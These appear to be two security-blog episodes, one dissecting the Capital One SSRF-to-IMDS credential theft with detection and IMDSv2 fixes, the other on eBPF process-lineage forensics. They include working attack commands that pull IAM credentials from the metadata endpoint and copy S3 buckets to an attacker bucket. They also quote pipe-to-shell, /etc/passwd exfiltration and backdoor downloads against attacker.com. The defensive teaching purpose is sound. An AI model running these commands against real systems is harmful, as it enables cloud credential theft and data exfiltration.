│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.


The Incident: Capital One (2019)

In March 2019, a misconfigured WAF at Capital One was running on AWS EC2. The WAF was a commercial product deployed in an EC2 instance with an attached IAM role — standard practice, necessary for the WAF to interact with other AWS services.

The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. AWS did not change IMDSv1 as a result — they had already released IMDSv2 in November 2019, months after the breach was discovered (July 2019). The breach timeline predates IMDSv2 availability. What it demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.

The revelation that the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability anywhere in your stack — in the application, in a WAF, in a sidecar, in a Lambda calling your EC2 — is a straight line to your IAM role credentials. The SSRF doesn’t need to be severe or complex. It just needs to reach 169.254.169.254.


Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-22T24:03:30Z"
}

These are real, valid AWS temporary credentials. The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid
{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: all buckets the role has s3:ListBucket on

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0" \
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table | \
  grep -E "optional|INSTANCE"
# Any row showing "optional" is IMDSv1-exposed

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is GetCallerIdentity from an unusual source IP paired with the instance role’s ARN appearing in CloudTrail from an IP that is not the instance itself.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
INSTANCE_IP="10.0.1.50"  # Your instance's known IP

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output text | \
  jq -r 'fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == "'"${DETECTOR_ROLE}"'") |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }' | \
  jq "select(.sourceIP != \"${INSTANCE_IP}\")"
  # Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-01234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely — meaning someone has physically exfiltrated the credentials to their own system and is using them from there.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.NetworkConnectionAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

Recon:IAMUser/UserPermissions — fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker’s Step 4 above). Often appears immediately before the data exfiltration events.

VPC Flow Logs: Connections to 169.254.169.254

VPC Flow Logs do not capture traffic to the IMDS endpoint by default — but they can capture egress from EC2 instances in ways that reveal post-exploitation. More useful for IMDS abuse is querying for unexpected source IPs calling the IMDS from within the VPC:

# Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

If you see source IPs in this query that are not your EC2 instance’s primary private IP — for example, container IPs within the pod CIDR — and you have --http-put-response-hop-limit 1 set, those requests should be failing. If they’re succeeding, the hop limit is not enforced.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, the PUT request to obtain an IMDSv2 token has a TTL of 1. When a process running inside a container tries to reach the IMDS, the request must traverse:

Container network namespace → veth pair → host network namespace → hypervisor IMDS endpoint

That traversal decrements the TTL below 1, and the PUT request never reaches the IMDS endpoint. The token is never issued. The GET request that follows has no token and — if --http-tokens required is also set — is rejected.

Hop limit = 1:
  Container → veth → [TTL=0, packet dropped]
  IMDS never receives the PUT, never issues a token

Hop limit = 2 (required for EKS with IMDS access):
  Container → veth → host → IMDS
  Token is issued; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity eliminates static credentials — pods get short-lived tokens scoped to their service account, not the node’s IAM role.


Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. The operational cost is near zero; the risk reduction is complete for the SSRF-to-IMDS credential chain.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced
# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'
# Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently "optional"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read instance_id; do
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:MetadataHttpTokens": "optional"
        }
      }
    }
  ]
}

Apply this SCP to all OUs except the management account. New ec2:RunInstances calls that don’t include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity eliminates static credentials removes the entire credential from the picture — there is no long-lived IAM role credential attached to the instance, so there is nothing for SSRF to retrieve.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defence in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS
# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.


⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. AWS SDK for Java v1 and Python (boto3 < 1.9.220) do not support IMDSv2 by default. Enforcing --http-tokens required on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions — that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# Requires >= 1.9.220 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default

EKS node groups and hop limit 2. If you run EKS and pods need to use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS — they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. The aws eks create-managed-node-group default is hop limit 2 for this reason; you can reduce it once you’ve confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

# EventBridge rule: alert immediately on S3 data events from unexpected sources
# (complements GuardDuty's delayed finding)
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.


Quick Reference

IMDSv1 vs IMDSv2

Attribute IMDSv1 IMDSv2
Authentication None — any HTTP GET works PUT to /latest/api/token required first to obtain a session token
SSRF exploitable Yes — one HTTP request returns credentials No — SSRF cannot initiate a PUT before a GET in standard flows
Session token TTL N/A 1 second to 21,600 seconds (configurable)
Hop limit enforcement N/A Enforced on PUT — TTL=1 blocks containers from reaching IMDS
AWS CLI enforcement --http-tokens optional (default on old instances) --http-tokens required
Capital One risk Present Eliminated

IMDSv2 Enforcement Commands by Provider

Provider Enforcement Command Scope
AWS — running instance aws ec2 modify-instance-metadata-options --instance-id i-xxx --http-tokens required --http-put-response-hop-limit 1 Single instance
AWS — launch template Add "MetadataOptions": {"HttpTokens": "required"} to launch template data All instances from template
AWS — org SCP Deny ec2:RunInstances where ec2:MetadataHttpTokens != required All accounts in org
AWS — Config rule ec2-imdsv2-check managed rule Compliance audit
GCP GCP does not have an unauthenticated IMDS equivalent; Metadata Server requires Metadata-Flavor: Google header — this header cannot be set via SSRF in most frameworks N/A
Azure Azure IMDS requires Metadata: true header — browser/SSRF requests typically cannot set this; additionally, IMDS returns only non-credential metadata by default (credentials via Managed Identity have their own endpoint with additional controls) N/A

Note on GCP and Azure: Both providers designed their metadata services with SSRF resistance in mind. The Metadata-Flavor: Google and Metadata: true headers must be explicitly set by the calling code — they are not added by default browser or curl requests. This does not make SSRF harmless on GCP/Azure (other metadata is still exposed), but the credential exfiltration path is harder than IMDSv1.


Key Takeaways

  • IMDSv1 has no authentication: any SSRF in any process running on an EC2 instance — application code, WAF, sidecar, proxy — is sufficient to retrieve the full IAM role credentials; no privilege escalation required
  • The Capital One breach was not a novel attack: it was a well-known SSRF-to-IMDS chain that had been documented for years before 2019; the industry was slow to enforce IMDSv2 at scale
  • --http-tokens required is the complete fix for the SSRF-to-IMDS credential chain; the operational cost is near zero; every production EC2 instance should have it; use an SCP to make it org-wide and durable
  • GuardDuty’s UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration finding is your primary post-exploitation signal but fires 5–15 minutes after the fact — pair it with IAM permission boundaries to limit blast radius and EventBridge rules on S3 data events for real-time alerting
  • The structural solution eliminates the credential entirely: OIDC workload identity eliminates static credentials on EKS/GKE means pods get scoped, short-lived tokens; the node’s instance role carries no application permissions; even a successful SSRF-to-IMDS attack yields nothing useful

What’s Next

SSRF gets you IAM credentials. But if the attacker is already inside a container — even a legitimate one — the path to the host is different. The credential-theft chain doesn’t apply when the attacker already has code execution inside a pod. EP08 covers Kubernetes container escape: hostPID, hostNetwork, privileged containers, and the kernel-level paths that take an attacker from container to node. The detection angle is where eBPF enters the picture — syscall-level visibility that catches escape attempts before they complete.

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe

Process Lineage — Reconstructing What Happened After the Fact

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 13
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability · LSM and Tetragon · Process Lineage


Architecture Overview

eBPF Process Lineage — kernel-level process ancestry tracking for runtime security forensics
eBPF tracks every exec() and fork() in the kernel — reconstructing the full process tree for forensic attribution.

TL;DR

  • Process lineage with eBPF hooks fork and exec at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp
    (kprobe on fork/exec = an eBPF program that fires every time the kernel’s fork() or execve() system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)
  • Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot
  • The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
  • Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream
  • Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
  • Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}' --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy
# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc/<pid>/cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.


A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.


How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (verifier/capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This forkexec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.


Building the Process Tree with kprobes

The two core hooks for process lineage:

# Every fork — capture parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (retval > 0) {
        # retval is the child PID (from parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, retval, comm);
    }
}'
# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n",
           pid,
           curtask->real_parent->tgid,
           str(args->filename),
           str(*args->argv));
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
